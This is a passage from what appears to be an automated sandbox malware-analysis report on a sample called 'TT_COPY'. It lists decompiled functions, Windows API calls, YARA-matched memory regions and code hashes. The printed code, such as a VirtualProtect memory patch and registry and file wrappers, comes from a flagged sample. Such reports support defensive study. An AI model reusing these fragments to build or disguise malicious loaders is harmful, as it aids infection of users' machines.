                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1005cbc12258fd1ef3b3ff4ca57938a3fff235e1afe3a37e7728dd7e4a936e8f
                                                                                                                            • Instruction ID: 076dcabafd8e4cedeba0ca4baf890874d76b5c35ab6169f007d99cebac2610eb
                                                                                                                            • Opcode Fuzzy Hash: 1005cbc12258fd1ef3b3ff4ca57938a3fff235e1afe3a37e7728dd7e4a936e8f
                                                                                                                            • Instruction Fuzzy Hash: 7B3166715082A94FDB1B8A7499503A57FE1EFCB234B4847D9C8848F497D2B1A38BC7A1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNELBASE(2D32AE79), ref: 02B6BBF6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1029625771-0
                                                                                                                            • Opcode ID: 675ae829ec5ce6704bdfea1aa50885c28a2a3f480e41e6880bd1719f21788399
                                                                                                                            • Instruction ID: 6ba3c359277c40e3ac4aba44e90d737bad76f97ea68bff58256896977ac19601
                                                                                                                            • Opcode Fuzzy Hash: 675ae829ec5ce6704bdfea1aa50885c28a2a3f480e41e6880bd1719f21788399
                                                                                                                            • Instruction Fuzzy Hash: 8E414375A0538A9FEB30AE7888893FA3772EF6A360F48005ADC49DF251E7744A41CB51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNELBASE(2D32AE79), ref: 02B6BBF6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1029625771-0
                                                                                                                            • Opcode ID: a7c4cfd9704b1e365f1f9e4628436019910fce9b005e73e528299f9ee2bb58cf
                                                                                                                            • Instruction ID: 93134ba3e270d8078434b7454c85198d601346cd6ea4a57369d586a937880a78
                                                                                                                            • Opcode Fuzzy Hash: a7c4cfd9704b1e365f1f9e4628436019910fce9b005e73e528299f9ee2bb58cf
                                                                                                                            • Instruction Fuzzy Hash: 9131EF7060438A9BDF759E1989A87FA37B6FF59360F84402EED0EAB200C7740A418F55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNELBASE(2D32AE79), ref: 02B6BBF6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1029625771-0
                                                                                                                            • Opcode ID: f4ab34a1e5fc7895b6ef640c602c9b5cb277ceeccdb78481aa9252dd6a3569b2
                                                                                                                            • Instruction ID: 64bf7395b5f06c14f047e038237113f94dc0a2aeb288eccb2b9b25b9f8766f95
                                                                                                                            • Opcode Fuzzy Hash: f4ab34a1e5fc7895b6ef640c602c9b5cb277ceeccdb78481aa9252dd6a3569b2
                                                                                                                            • Instruction Fuzzy Hash: FC3155B464134A9FEF308E6A9DCD3EA3767EF99350F94402ADC499B204C3740A428F65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNELBASE(2D32AE79), ref: 02B6BBF6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1029625771-0
                                                                                                                            • Opcode ID: 09db716563f89f5dbd9375a20c913771ec54657f961eeb31b1e2557673b87c49
                                                                                                                            • Instruction ID: 2675f8b39c7cd1b5442b085f2bd7f3eb8e4632679922f886b3c0d2a948feb020
                                                                                                                            • Opcode Fuzzy Hash: 09db716563f89f5dbd9375a20c913771ec54657f961eeb31b1e2557673b87c49
                                                                                                                            • Instruction Fuzzy Hash: 18210AB1A003459BDB309E658D887EA3767FF95790F95806ADC499B204D7740A01CB61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNELBASE(2D32AE79), ref: 02B6BBF6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1029625771-0
                                                                                                                            • Opcode ID: 939db133f6458709278b7a628392f94a428791a3e836f241a2d696d6a03c0709
                                                                                                                            • Instruction ID: 8d8482e39c6fa79087f594b850ceb1f1d5936f4b2b635cbeb82a6b0416aa2628
                                                                                                                            • Opcode Fuzzy Hash: 939db133f6458709278b7a628392f94a428791a3e836f241a2d696d6a03c0709
                                                                                                                            • Instruction Fuzzy Hash: AF11E97060034AABDF719E59998D7EA3766FF557A0F54401ADC099B104C7B40F428F94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 70%
                                                                                                                            			E0040167B() {
                                                                                                                            				int _t7;
                                                                                                                            				void* _t13;
                                                                                                                            				void* _t15;
                                                                                                                            				void* _t20;
                                                                                                                            
                                                                                                                            				_t18 = E00402DA6(0xffffffd0);
                                                                                                                            				_t16 = E00402DA6(0xffffffdf);
                                                                                                                            				E00402DA6(0x13);
                                                                                                                            				_t7 = MoveFileW(_t4, _t5); // executed
                                                                                                                            				if(_t7 == 0) {
                                                                                                                            					if( *((intOrPtr*)(_t20 - 0x28)) == _t13 || E00406873(_t18) == 0) {
                                                                                                                            						 *((intOrPtr*)(_t20 - 4)) = 1;
                                                                                                                            					} else {
                                                                                                                            						E004062FD(_t15, _t18, _t16);
                                                                                                                            						_push(0xffffffe4);
                                                                                                                            						goto L5;
                                                                                                                            					}
                                                                                                                            				} else {
                                                                                                                            					_push(0xffffffe3);
                                                                                                                            					L5:
                                                                                                                            					E00401423();
                                                                                                                            				}
                                                                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t20 - 4));
                                                                                                                            				return 0;
                                                                                                                            			}







                                                                                                                            0x00401684
                                                                                                                            0x0040168d
                                                                                                                            0x0040168f
                                                                                                                            0x00401696
                                                                                                                            0x0040169e
                                                                                                                            0x004016aa
                                                                                                                            0x0040292e
                                                                                                                            0x004016be
                                                                                                                            0x004016c0
                                                                                                                            0x004016c5
                                                                                                                            0x00000000
                                                                                                                            0x004016c5
                                                                                                                            0x004016a0
                                                                                                                            0x004016a0
                                                                                                                            0x004022f1
                                                                                                                            0x004022f1
                                                                                                                            0x004022f1
                                                                                                                            0x00402c2d
                                                                                                                            0x00402c39

                                                                                                                            APIs
                                                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileMove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3562171763-0
                                                                                                                            • Opcode ID: 416424ad14324c56da6b5b470dd69dd800957d04f882025aa34f231cf59109c3
                                                                                                                            • Instruction ID: 97031ceaf8e9c96da62d10e645a43f8a4e886df5684b2e10da682d8a0e9c10a3
                                                                                                                            • Opcode Fuzzy Hash: 416424ad14324c56da6b5b470dd69dd800957d04f882025aa34f231cf59109c3
                                                                                                                            • Instruction Fuzzy Hash: C3F09631A08124E6CB117BA69E4DE5E21549F82364B24063FF011B11D1D9BCC902659E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004063D8(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                                                            				void* _t7;
                                                                                                                            				long _t8;
                                                                                                                            				void* _t9;
                                                                                                                            
                                                                                                                            				_t7 = E00406329(_a4,  &_a12);
                                                                                                                            				if(_t7 != 0) {
                                                                                                                            					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                                                                                                            					return _t8;
                                                                                                                            				}
                                                                                                                            				_t9 = 6;
                                                                                                                            				return _t9;
                                                                                                                            			}






                                                                                                                            0x004063e2
                                                                                                                            0x004063eb
                                                                                                                            0x00406401
                                                                                                                            0x00000000
                                                                                                                            0x00406401
                                                                                                                            0x004063ef
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 00406401
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2289755597-0
                                                                                                                            • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                                                            • Instruction ID: ccab944935cfefb85f0e849ce69279fb55db75a3b7fb0960311cd9d36817041a
                                                                                                                            • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                                                            • Instruction Fuzzy Hash: 04E0E6B2010109BFEF095F90DC0AD7B3B1DE704300F01892EFD06D4091E6B5AD306675
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004060DF(void* _a4, void* _a8, long _a12) {
                                                                                                                            				int _t7;
                                                                                                                            				long _t11;
                                                                                                                            
                                                                                                                            				_t11 = _a12;
                                                                                                                            				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                                            				if(_t7 == 0 || _t11 != _a12) {
                                                                                                                            					return 0;
                                                                                                                            				} else {
                                                                                                                            					return 1;
                                                                                                                            				}
                                                                                                                            			}





                                                                                                                            0x004060e3
                                                                                                                            0x004060f3
                                                                                                                            0x004060fb
                                                                                                                            0x00000000
                                                                                                                            0x00406102
                                                                                                                            0x00000000
                                                                                                                            0x00406104

                                                                                                                            APIs
                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3934441357-0
                                                                                                                            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                            • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                                                                                                                            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                            • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004060B0(void* _a4, void* _a8, long _a12) {
                                                                                                                            				int _t7;
                                                                                                                            				long _t11;
                                                                                                                            
                                                                                                                            				_t11 = _a12;
                                                                                                                            				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                                            				if(_t7 == 0 || _t11 != _a12) {
                                                                                                                            					return 0;
                                                                                                                            				} else {
                                                                                                                            					return 1;
                                                                                                                            				}
                                                                                                                            			}





                                                                                                                            0x004060b4
                                                                                                                            0x004060c4
                                                                                                                            0x004060cc
                                                                                                                            0x00000000
                                                                                                                            0x004060d3
                                                                                                                            0x00000000
                                                                                                                            0x004060d5

                                                                                                                            APIs
                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2738559852-0
                                                                                                                            • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                            • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                                                                                                                            • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                            • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                            
                                                                                                                            				 *0x70b55048 = _a4;
                                                                                                                            				if(_a8 == 1) {
                                                                                                                            					VirtualProtect(0x70b5505c, 4, 0x40, 0x70b5504c); // executed
                                                                                                                            					 *0x70b5505c = 0xc2;
                                                                                                                            					 *0x70b5504c = 0;
                                                                                                                            					 *0x70b55054 = 0;
                                                                                                                            					 *0x70b55068 = 0;
                                                                                                                            					 *0x70b55058 = 0;
                                                                                                                            					 *0x70b55050 = 0;
                                                                                                                            					 *0x70b55060 = 0;
                                                                                                                            					 *0x70b5505e = 0;
                                                                                                                            				}
                                                                                                                            				return 1;
                                                                                                                            			}



                                                                                                                            0x70b52a88
                                                                                                                            0x70b52a8d
                                                                                                                            0x70b52a9d
                                                                                                                            0x70b52aa5
                                                                                                                            0x70b52aac
                                                                                                                            0x70b52ab1
                                                                                                                            0x70b52ab6
                                                                                                                            0x70b52abb
                                                                                                                            0x70b52ac0
                                                                                                                            0x70b52ac5
                                                                                                                            0x70b52aca
                                                                                                                            0x70b52aca
                                                                                                                            0x70b52ad2

                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(70B5505C,00000004,00000040,70B5504C), ref: 70B52A9D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1093774692.0000000070B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 70B50000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1093699351.0000000070B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1093840225.0000000070B54000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1093914971.0000000070B56000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_70b50000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 544645111-0
                                                                                                                            • Opcode ID: 8c937647f5bd840596f09c7205c491b05e07b52941915ad1b1331a472cf83024
                                                                                                                            • Instruction ID: 0695267586a90a3cc91c52b34fb59784e028d6e6f7480dfe1df143ce73e0fdb7
                                                                                                                            • Opcode Fuzzy Hash: 8c937647f5bd840596f09c7205c491b05e07b52941915ad1b1331a472cf83024
                                                                                                                            • Instruction Fuzzy Hash: CDF092B2501380DEC370DF2A8CA470A3BE0B709316B3C45EAF188D72E0EB745648CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004063AA(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                                                            				void* _t7;
                                                                                                                            				long _t8;
                                                                                                                            				void* _t9;
                                                                                                                            
                                                                                                                            				_t7 = E00406329(_a4,  &_a12);
                                                                                                                            				if(_t7 != 0) {
                                                                                                                            					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                                                                                                            					return _t8;
                                                                                                                            				}
                                                                                                                            				_t9 = 6;
                                                                                                                            				return _t9;
                                                                                                                            			}






                                                                                                                            0x004063b4
                                                                                                                            0x004063bb
                                                                                                                            0x004063ce
                                                                                                                            0x00000000
                                                                                                                            0x004063ce
                                                                                                                            0x004063bf
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C248,?,?,00406438,0042C248,00000000,?,?,Call,?), ref: 004063CE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Open
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 71445658-0
                                                                                                                            • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                            • Instruction ID: 4361357c0318622cec318f667d88df30c4c29b75262f7bca7234b06b46464da2
                                                                                                                            • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                            • Instruction Fuzzy Hash: 83D0123210020EBBDF115F91AD01FAB3B5DAB08310F014426FE06E40A1D775D530A764
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004015A3() {
                                                                                                                            				int _t5;
                                                                                                                            				void* _t11;
                                                                                                                            				int _t14;
                                                                                                                            
                                                                                                                            				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
                                                                                                                            				_t14 = _t5;
                                                                                                                            				if(_t14 == 0) {
                                                                                                                            					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                                                                                            				}
                                                                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t11 - 4));
                                                                                                                            				return 0;
                                                                                                                            			}






                                                                                                                            0x004015ae
                                                                                                                            0x004015b4
                                                                                                                            0x004015b6
                                                                                                                            0x0040292e
                                                                                                                            0x0040292e
                                                                                                                            0x00402c2d
                                                                                                                            0x00402c39

                                                                                                                            APIs
                                                                                                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 29eea6b5a09a6d8c49f57e15a09f4be863ef57e1fa732700e8a4e446e1540181
                                                                                                                            • Instruction ID: 33d43a8ddb5fee1851102b8e64c9f064c627007e01bf6cdc746e786b0f5045d9
                                                                                                                            • Opcode Fuzzy Hash: 29eea6b5a09a6d8c49f57e15a09f4be863ef57e1fa732700e8a4e446e1540181
                                                                                                                            • Instruction Fuzzy Hash: 30D01772B08110DBDB11DBA8AA48B9D72A4AB50368B208537D111F61D0E6B8C945AA19
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(?,02B6F37F), ref: 02B5E1A5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1129996299-0
                                                                                                                            • Opcode ID: 9707800b70a5dc258a843f75b77db4a9e667fe39b0680b7f20119b3797382917
